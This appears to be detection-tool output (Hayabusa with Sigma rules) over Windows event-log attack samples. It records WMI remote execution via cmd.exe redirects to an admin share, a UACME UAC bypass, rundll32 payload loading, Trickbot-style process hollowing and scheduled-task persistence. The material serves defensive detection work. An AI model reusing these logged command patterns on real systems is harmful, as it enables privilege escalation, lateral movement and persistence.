+00:00,MSEDGEWIN10,1,info,,Process Created,Cmd: cmd.exe /Q /c cd \ 1> \\127.0.0.1\C$\WqEVwJZYOe 2>&1 | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\Administrator | Parent Cmd: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding | LID: 0x33a8a8 | PID: 2628 | PGUID: 747F3D96-75D1-5F8B-0000-00109EB23300,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/smbmap_upload_exec_sysmon.evtx +2020-10-17 22:53:05.436 +00:00,MSEDGEWIN10,1,high,Exec,Wmiprvse Spawning Process,,rules/sigma/process_creation_sysmon/proc_creation_win_wmiprvse_spawning_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/smbmap_upload_exec_sysmon.evtx +2020-10-17 22:53:05.436 +00:00,MSEDGEWIN10,1,low,Disc,Redirect Output in CommandLine,,rules/sigma/process_creation_sysmon/proc_creation_win_cmd_redirect.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/smbmap_upload_exec_sysmon.evtx +2020-10-17 22:53:05.633 +00:00,MSEDGEWIN10,11,info,,File Created,Path: C:\WqEVwJZYOe | Process: System | PID: 4 | PGUID: 747F3D96-726A-5F8B-0000-0010EB030000,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/smbmap_upload_exec_sysmon.evtx +2020-10-17 22:53:05.676 +00:00,MSEDGEWIN10,1,info,,Process Created,Cmd: cmd.exe /Q /c cd 1> \\127.0.0.1\C$\WqEVwJZYOe 2>&1 | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\Administrator | Parent Cmd: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding | LID: 0x33a8a8 | PID: 4864 | PGUID: 747F3D96-75D1-5F8B-0000-001061BD3300,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/smbmap_upload_exec_sysmon.evtx +2020-10-17 22:53:05.676 +00:00,MSEDGEWIN10,1,high,Exec,Wmiprvse Spawning Process,,rules/sigma/process_creation_sysmon/proc_creation_win_wmiprvse_spawning_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/smbmap_upload_exec_sysmon.evtx +2020-10-17 22:53:05.676 +00:00,MSEDGEWIN10,1,low,Disc,Redirect Output in CommandLine,,rules/sigma/process_creation_sysmon/proc_creation_win_cmd_redirect.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/smbmap_upload_exec_sysmon.evtx +2020-10-17 22:53:05.720 +00:00,MSEDGEWIN10,11,info,,File Created,Path: C:\WqEVwJZYOe | Process: System | PID: 4 | PGUID: 747F3D96-726A-5F8B-0000-0010EB030000,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/smbmap_upload_exec_sysmon.evtx +2020-10-17 22:53:05.777 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: cmd.exe /Q /c c:\windows\system32\rundll32.exe c:\programdata\7okjer,#1 1> \\127.0.0.1\C$\WqEVwJZYOe 2>&1 | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\Administrator | Parent Cmd: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding | LID: 0x33a8a8 | PID: 2784 | PGUID: 747F3D96-75D1-5F8B-0000-001088C23300",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/smbmap_upload_exec_sysmon.evtx +2020-10-17 22:53:05.777 +00:00,MSEDGEWIN10,1,high,Exec,Wmiprvse Spawning Process,,rules/sigma/process_creation_sysmon/proc_creation_win_wmiprvse_spawning_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/smbmap_upload_exec_sysmon.evtx +2020-10-17 22:53:05.777 +00:00,MSEDGEWIN10,1,low,Disc,Redirect Output in CommandLine,,rules/sigma/process_creation_sysmon/proc_creation_win_cmd_redirect.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/smbmap_upload_exec_sysmon.evtx +2020-10-17 22:53:05.822 +00:00,MSEDGEWIN10,11,info,,File Created,Path: C:\WqEVwJZYOe | Process: System | PID: 4 | PGUID: 747F3D96-726A-5F8B-0000-0010EB030000,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/smbmap_upload_exec_sysmon.evtx +2020-10-17 22:53:06.755 +00:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 127.0.0.1:49676 (MSEDGEWIN10) | Dst: 127.0.0.1:445 (MSEDGEWIN10) | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: 747F3D96-726A-5F8B-0000-0010EB030000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/smbmap_upload_exec_sysmon.evtx +2020-10-17 22:53:06.755 +00:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 127.0.0.1:49676 (MSEDGEWIN10) | Dst: 127.0.0.1:445 (MSEDGEWIN10) | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: 747F3D96-726A-5F8B-0000-0010EB030000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/smbmap_upload_exec_sysmon.evtx +2020-10-20 11:50:54.810 +00:00,DESKTOP-NTSSLJD,1,high,,Process Created_Sysmon Alert,"technique_id=T1059.001,technique_name=PowerShell | Cmd: ""C:\Users\den\Source\Repos\UACME\Source\Akagi\output\x64\Release\Akagi64.exe"" 64 | Process: C:\Users\den\Source\Repos\UACME\Source\Akagi\output\x64\Release\Akagi64.exe | User: DESKTOP-NTSSLJD\den | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" | LID: 0x17ed8c | PID: 8712 | PGUID: 23F38D93-CF1E-5F8E-C808-000000000C00 | Hash: SHA1=4DFA874CE545B22B3AAFF93BD143C6E463996698,MD5=661D7257C25198B973361117467616BE,SHA256=870691CFC9C98866B2AF2E7E48ED5FD5F1D14CFE0E3E9C630BC472FC0A013D0B,IMPHASH=F31CA5C7DD56008F53D4F3926CF37891",rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_64.evtx +2020-10-20 11:50:54.810 +00:00,DESKTOP-NTSSLJD,1,high,Evas | PrivEsc,UAC Bypass Tool UACMe,,rules/sigma/process_creation_sysmon/proc_creation_win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_64.evtx +2020-10-20 11:50:54.814 +00:00,DESKTOP-NTSSLJD,7,info,Evas,Suspicious Load of Advapi31.dll,,rules/sigma/image_load/image_load_susp_advapi32_dll.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_64.evtx +2020-10-20 11:50:55.102 +00:00,DESKTOP-NTSSLJD,12,medium,,Registry Key Create/Delete_Sysmon Alert,"technique_id=T1130,technique_name=Install Root Certificate | CreateKey: HKU\S-1-5-21-2261457211-1283403626-3207602914-1001\Software\Microsoft\SystemCertificates\Root\Certificates | Process: C:\Windows\system32\consent.exe | PID: 8264 | PGUID: 23F38D93-CF1E-5F8E-C908-000000000C00",rules/hayabusa/sysmon/alerts/12_RegistryKeyCreateDelete_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_64.evtx +2020-10-20 11:50:55.388 +00:00,DESKTOP-NTSSLJD,12,medium,,Registry Key Create/Delete_Sysmon Alert,"technique_id=T1130,technique_name=Install Root Certificate | CreateKey: HKU\S-1-5-21-2261457211-1283403626-3207602914-1001\Software\Microsoft\SystemCertificates\Root\Certificates | Process: C:\Program Files\Internet Explorer\IEInstal.exe | PID: 8736 | PGUID: 23F38D93-CF1F-5F8E-CA08-000000000C00",rules/hayabusa/sysmon/alerts/12_RegistryKeyCreateDelete_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_64.evtx +2020-10-20 11:50:55.390 +00:00,DESKTOP-NTSSLJD,12,medium,,Registry Key Create/Delete_Sysmon Alert,"technique_id=T1130,technique_name=Install Root Certificate | CreateKey: HKLM\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates | Process: C:\Program Files\Internet Explorer\IEInstal.exe | PID: 8736 | PGUID: 23F38D93-CF1F-5F8E-CA08-000000000C00",rules/hayabusa/sysmon/alerts/12_RegistryKeyCreateDelete_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_64.evtx +2020-10-20 11:50:55.392 +00:00,DESKTOP-NTSSLJD,12,medium,,Registry Key Create/Delete_Sysmon Alert,"technique_id=T1130,technique_name=Install Root Certificate | CreateKey: HKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Root\Certificates | Process: C:\Program Files\Internet Explorer\IEInstal.exe | PID: 8736 | PGUID: 23F38D93-CF1F-5F8E-CA08-000000000C00",rules/hayabusa/sysmon/alerts/12_RegistryKeyCreateDelete_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_64.evtx +2020-10-20 11:50:55.450 +00:00,DESKTOP-NTSSLJD,11,info,,File Created,Path: C:\Users\den\AppData\Local\Temp\IDC1.tmp\[1]consent.exe | Process: C:\Program Files\Internet Explorer\IEInstal.exe | PID: 8736 | PGUID: 23F38D93-CF1F-5F8E-CA08-000000000C00,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_64.evtx +2020-10-20 11:50:55.450 +00:00,DESKTOP-NTSSLJD,11,high,Evas | PrivEsc,UAC Bypass Using IEInstal - File,,rules/sigma/file_event/file_event_win_uac_bypass_ieinstal.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_64.evtx +2020-10-20 11:50:55.450 +00:00,DESKTOP-NTSSLJD,11,low,ResDev,Creation of an Executable by an Executable,,rules/sigma/file_event/file_event_win_susp_dropper.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_64.evtx +2020-10-20 11:50:55.461 +00:00,DESKTOP-NTSSLJD,23,info,,Deleted File Archived,C:\Users\den\AppData\Local\Temp\dfcc1807-03a1-4ae1-ab29-5675b285edea\consent.exe.dat | Process: C:\Program Files\Internet Explorer\IEInstal.exe | User: DESKTOP-NTSSLJD\den | PID: 8736 | PGUID: 23F38D93-CF1F-5F8E-CA08-000000000C00,rules/hayabusa/sysmon/events/23_DeletedFileArchived.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_64.evtx +2020-10-20 11:50:55.577 +00:00,DESKTOP-NTSSLJD,12,medium,,Registry Key Create/Delete_Sysmon Alert,"technique_id=T1130,technique_name=Install Root Certificate | CreateKey: HKU\S-1-5-21-2261457211-1283403626-3207602914-1001\Software\Microsoft\SystemCertificates\Root\Certificates | Process: C:\Windows\system32\consent.exe | PID: 3760 | PGUID: 23F38D93-CF1F-5F8E-CB08-000000000C00",rules/hayabusa/sysmon/alerts/12_RegistryKeyCreateDelete_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_64.evtx +2020-10-20 11:50:56.004 +00:00,DESKTOP-NTSSLJD,23,info,,Deleted File Archived,C:\Users\den\AppData\Local\Temp\IDC1.tmp\[1]consent.exe | Process: C:\Windows\system32\DllHost.exe | User: DESKTOP-NTSSLJD\den | PID: 9444 | PGUID: 23F38D93-CF1F-5F8E-CC08-000000000C00,rules/hayabusa/sysmon/events/23_DeletedFileArchived.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_64.evtx +2020-10-20 11:50:56.090 +00:00,DESKTOP-NTSSLJD,11,info,,File Created,Path: C:\Users\den\AppData\Local\Temp\[1]consent.exe | Process: C:\Windows\explorer.exe | PID: 8712 | PGUID: 23F38D93-CF1E-5F8E-C808-000000000C00,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_64.evtx +2020-10-20 11:50:56.090 +00:00,DESKTOP-NTSSLJD,11,low,ResDev,Creation of an Executable by an Executable,,rules/sigma/file_event/file_event_win_susp_dropper.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_64.evtx +2020-10-20 11:50:56.218 +00:00,DESKTOP-NTSSLJD,12,medium,,Registry Key Create/Delete_Sysmon Alert,"technique_id=T1130,technique_name=Install Root Certificate | CreateKey: HKU\S-1-5-21-2261457211-1283403626-3207602914-1001\Software\Microsoft\SystemCertificates\Root\Certificates | Process: C:\Windows\system32\consent.exe | PID: 112 | PGUID: 23F38D93-CF20-5F8E-CD08-000000000C00",rules/hayabusa/sysmon/alerts/12_RegistryKeyCreateDelete_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_64.evtx +2020-10-20 11:50:56.490 +00:00,DESKTOP-NTSSLJD,1,high,,Process Created_Sysmon Alert,"technique_id=T1036,technique_name=Masquerading | Cmd: C:\Users\den\AppData\Local\Temp\IDC1.tmp\[1]consent.exe | Process: C:\Users\den\AppData\Local\Temp\IDC1.tmp\[1]consent.exe | User: DESKTOP-NTSSLJD\den | Parent Cmd: ""C:\Program Files\Internet Explorer\IEInstal.exe"" -Embedding | LID: 0x17eca2 | PID: 6896 | PGUID: 23F38D93-CF20-5F8E-CE08-000000000C00 | Hash: SHA1=6298449EB38C20ABFE79C32346258BF4951C1E53,MD5=98F48037163A97285E72A2107F0336CA,SHA256=B26D892448D336EBFAB26F033457D1A2A94E3CD8FBBDA5AE0DBB09E16BE4C84E,IMPHASH=DEA061EF56E13C6D0B065E71A879D9B6",rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_64.evtx +2020-10-20 11:50:56.490 +00:00,DESKTOP-NTSSLJD,1,high,Evas | PrivEsc,UAC Bypass Using IEInstal - Process,,rules/sigma/process_creation_sysmon/proc_creation_win_uac_bypass_ieinstal.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_64.evtx +2020-10-20 11:50:56.490 +00:00,DESKTOP-NTSSLJD,1,high,Evas | PrivEsc,UAC Bypass Tool UACMe,,rules/sigma/process_creation_sysmon/proc_creation_win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_64.evtx +2020-10-20 11:50:56.490 +00:00,DESKTOP-NTSSLJD,1,low,Exec,Process Start From Suspicious Folder,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_run_folder.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_64.evtx +2020-10-20 11:50:56.517 +00:00,DESKTOP-NTSSLJD,7,info,Evas,Suspicious Load of Advapi31.dll,,rules/sigma/image_load/image_load_susp_advapi32_dll.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_64.evtx +2020-10-20 11:50:56.531 +00:00,DESKTOP-NTSSLJD,7,low,,Image Loaded_Sysmon Alert,"technique_id=T1073,technique_name=DLL Side-Loading | Image: C:\Users\den\AppData\Local\Temp\IDC1.tmp\[1]consent.exe | Process: C:\Users\den\AppData\Local\Temp\IDC1.tmp\[1]consent.exe | Company: Integrity Investment LLC | Signed: false | Signature: Unavailable | PID: 6896 | PGUID: 23F38D93-CF20-5F8E-CE08-000000000C00 | Hash: SHA1=6298449EB38C20ABFE79C32346258BF4951C1E53,MD5=98F48037163A97285E72A2107F0336CA,SHA256=B26D892448D336EBFAB26F033457D1A2A94E3CD8FBBDA5AE0DBB09E16BE4C84E,IMPHASH=DEA061EF56E13C6D0B065E71A879D9B6",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_64.evtx +2020-10-20 11:50:56.569 +00:00,DESKTOP-NTSSLJD,1,high,,Process Created_Sysmon Alert,"technique_id=T1059.003,technique_name=Windows Command Shell | Cmd: ""C:\Windows\system32\cmd.exe"" | Process: C:\Windows\System32\cmd.exe | User: DESKTOP-NTSSLJD\den | Parent Cmd: C:\Users\den\AppData\Local\Temp\IDC1.tmp\[1]consent.exe | LID: 0x17eca2 | PID: 9620 | PGUID: 23F38D93-CF20-5F8E-D008-000000000C00 | Hash: SHA1=8DCA9749CD48D286950E7A9FA1088C937CBCCAD4,MD5=D7AB69FAD18D4A643D84A271DFC0DBDF,SHA256=FF79D3C4A0B7EB191783C323AB8363EBD1FD10BE58D8BCC96B07067743CA81D5,IMPHASH=272245E2988E1E430500B852C4FB5E18",rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_64.evtx +2020-10-20 11:50:56.569 +00:00,DESKTOP-NTSSLJD,10,high,,Process Access_Sysmon Alert,"technique_id=T1036,technique_name=Masquerading | Src Process: C:\Users\den\AppData\Local\Temp\IDC1.tmp\[1]consent.exe | Tgt Process: C:\Windows\system32\cmd.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 6896 | Src PGUID: 23F38D93-CF20-5F8E-CE08-000000000C00 | Tgt PID: 9620 | Tgt PGUID: 23F38D93-CF20-5F8E-D008-000000000C00",rules/hayabusa/sysmon/alerts/10_ProcessAccess_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_64.evtx +2020-10-20 11:50:56.590 +00:00,DESKTOP-NTSSLJD,5,info,,Process Terminated,Process: C:\Users\den\AppData\Local\Temp\IDC1.tmp\[1]consent.exe | PID: 6896 | PGUID: 23F38D93-CF20-5F8E-CE08-000000000C00,rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_64.evtx +2020-10-20 11:50:56.731 +00:00,DESKTOP-NTSSLJD,12,medium,,Registry Key Create/Delete_Sysmon Alert,"technique_id=T1130,technique_name=Install Root Certificate | CreateKey: HKU\S-1-5-21-2261457211-1283403626-3207602914-1001\Software\Microsoft\SystemCertificates\Root\Certificates | Process: C:\Windows\system32\consent.exe | PID: 7716 | PGUID: 23F38D93-CF20-5F8E-CF08-000000000C00",rules/hayabusa/sysmon/alerts/12_RegistryKeyCreateDelete_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_64.evtx +2020-10-20 11:50:56.999 +00:00,DESKTOP-NTSSLJD,23,info,,Deleted File Archived,C:\Users\den\AppData\Local\Temp\IDC1.tmp\[1]consent.exe | Process: C:\Windows\system32\DllHost.exe | User: DESKTOP-NTSSLJD\den | PID: 9444 | PGUID: 23F38D93-CF1F-5F8E-CC08-000000000C00,rules/hayabusa/sysmon/events/23_DeletedFileArchived.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_64.evtx +2020-10-20 11:50:57.031 +00:00,DESKTOP-NTSSLJD,5,info,,Process Terminated,Process: C:\Users\den\Source\Repos\UACME\Source\Akagi\output\x64\Release\Akagi64.exe | PID: 8712 | PGUID: 23F38D93-CF1E-5F8E-C808-000000000C00,rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_64.evtx +2020-10-20 11:51:01.476 +00:00,DESKTOP-NTSSLJD,22,info,,DNS Query,Query: wpad | Result: - | Process: C:\Windows\System32\svchost.exe | PID: 2428 | PGUID: 23F38D93-ABAC-5F8E-3900-000000000C00,rules/hayabusa/sysmon/events/22_DNS-Query.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_64.evtx +2020-10-20 22:33:02.063 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: C:\Windows\system32\wermgr.exe | Process: C:\Windows\System32\wermgr.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: rundll32.exe c:\temp\winfire.dll,DllRegisterServer | LID: 0x910e0 | PID: 5600 | PGUID: 747F3D96-659E-5F8F-0000-001064E03300",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_hollowing_wermgr_masquerading.evtx +2020-10-20 22:33:02.063 +00:00,MSEDGEWIN10,1,critical,Exec,Trickbot Malware Activity,,rules/sigma/process_creation_sysmon/proc_creation_win_malware_trickbot_wermgr.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_hollowing_wermgr_masquerading.evtx +2020-10-20 22:33:02.064 +00:00,MSEDGEWIN10,10,low,,Process Access,Src Process: C:\Windows\SysWOW64\rundll32.exe | Tgt Process: C:\Windows\system32\wermgr.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 2372 | Src PGUID: 747F3D96-659B-5F8F-0000-001026C33300 | Tgt PID: 5600 | Tgt PGUID: 747F3D96-659E-5F8F-0000-001064E03300,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_hollowing_wermgr_masquerading.evtx +2020-10-20 22:33:02.064 +00:00,MSEDGEWIN10,10,low,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/proc_access_win_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_hollowing_wermgr_masquerading.evtx +2020-10-20 22:35:26.755 +00:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding | Process: C:\Windows\System32\wbem\WmiPrvSE.exe | User: NT AUTHORITY\NETWORK SERVICE | Parent Cmd: ? | LID: 0x3e4 | PID: 6748 | PGUID: 747F3D96-662E-5F8F-0000-001023353800,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_hollowing_wermgr_masquerading.evtx +2020-10-23 21:55:59.769 +00:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: C:\Users\IEUser\AppData\Local\Temp\{2015B2D1-1706-42F6-8C0E-8BEECB408D48}-86.0.4240.111_86.0.4240.75_chrome_updater.exe | URL: http://r2---sn-5hnekn7z.gvt1.com/edgedl/release2/chrome/E4_ltUMmNI-KvJYPRyaXng_86.0.4240.111/86.0.4240.111_86.0.4240.75_chrome_updater.exe?cms_redirect=yes&mh=3q&mip=213.127.65.23&mm=28&mn=sn-5hnekn7z&ms=nvh&mt=1603490058&mv=m&mvi=2&pl=17&shardbypass=yes,rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-10-23 21:57:29.217 +00:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding | Process: C:\Windows\System32\wbem\WmiPrvSE.exe | User: NT AUTHORITY\NETWORK SERVICE | Parent Cmd: ? | LID: 0x3e4 | PID: 8796 | PGUID: 747F3D96-51C9-5F93-0000-001010175B00,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_cmd_schtask.evtx +2020-10-23 21:57:34.745 +00:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Users\IEUser\AppData\Local\Temp\tmp1375\__tmp_rar_sfx_access_check_2914968 | Process: c:\Users\Public\test.tmp | PID: 7624 | PGUID: 747F3D96-51CD-5F93-0000-001073735B00,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_cmd_schtask.evtx +2020-10-23 21:57:34.767 +00:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Users\IEUser\AppData\Local\Temp\tmp1375\d948 | Process: c:\Users\Public\test.tmp | PID: 7624 | PGUID: 747F3D96-51CD-5F93-0000-001073735B00,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_cmd_schtask.evtx +2020-10-23 21:57:36.014 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\System32\rundll32.exe"" conf3234.dll f8753 d948 | Process: C:\Windows\SysWOW64\rundll32.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: c:\Users\Public\test.tmp | LID: 0x8a585 | PID: 3396 | PGUID: 747F3D96-51D0-5F93-0000-001036A15B00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_cmd_schtask.evtx +2020-10-23 21:57:36.332 +00:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Users\IEUser\AppData\Local\Temp\sduchxll.tmp | Process: C:\Windows\SysWOW64\rundll32.exe | PID: 3396 | PGUID: 747F3D96-51D0-5F93-0000-001036A15B00,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_cmd_schtask.evtx +2020-10-23 21:57:36.399 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\System32\cmd.exe"" /C schtasks /Create /f /XML C:\Users\IEUser\AppData\Local\Temp\sduchxll.tmp /TN DataUsageHandlers | Process: C:\Windows\SysWOW64\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\rundll32.exe"" conf3234.dll f8753 d948 | LID: 0x8a585 | PID: 5572 | PGUID: 747F3D96-51D0-5F93-0000-0010B2B35B00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_cmd_schtask.evtx +2020-10-23 21:57:36.631 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: schtasks /Create /f /XML C:\Users\IEUser\AppData\Local\Temp\sduchxll.tmp /TN DataUsageHandlers | Process: C:\Windows\SysWOW64\schtasks.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C schtasks /Create /f /XML C:\Users\IEUser\AppData\Local\Temp\sduchxll.tmp /TN DataUsageHandlers | LID: 0x8a585 | PID: 8572 | PGUID: 747F3D96-51D0-5F93-0000-001079C05B00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_cmd_schtask.evtx +2020-10-23 21:57:36.631 +00:00,MSEDGEWIN10,1,high,Exec,Suspicious Add Scheduled Task From User AppData Temp,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_schtasks_user_temp.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_cmd_schtask.evtx +2020-10-23 21:57:36.631 +00:00,MSEDGEWIN10,1,high,Exec,Suspicius Schtasks From Env Var Folder,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_schtasks_env_folder.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_cmd_schtask.evtx +2020-10-23 21:57:36.631 +00:00,MSEDGEWIN10,1,high,Exec,Suspicious Add Scheduled Command Pattern,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_schtasks_pattern.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_cmd_schtask.evtx +2020-10-23 21:57:36.631 +00:00,MSEDGEWIN10,1,low,Exec | Persis | PrivEsc,Scheduled Task Creation,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_schtask_creation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_cmd_schtask.evtx +2020-10-23 21:58:07.601 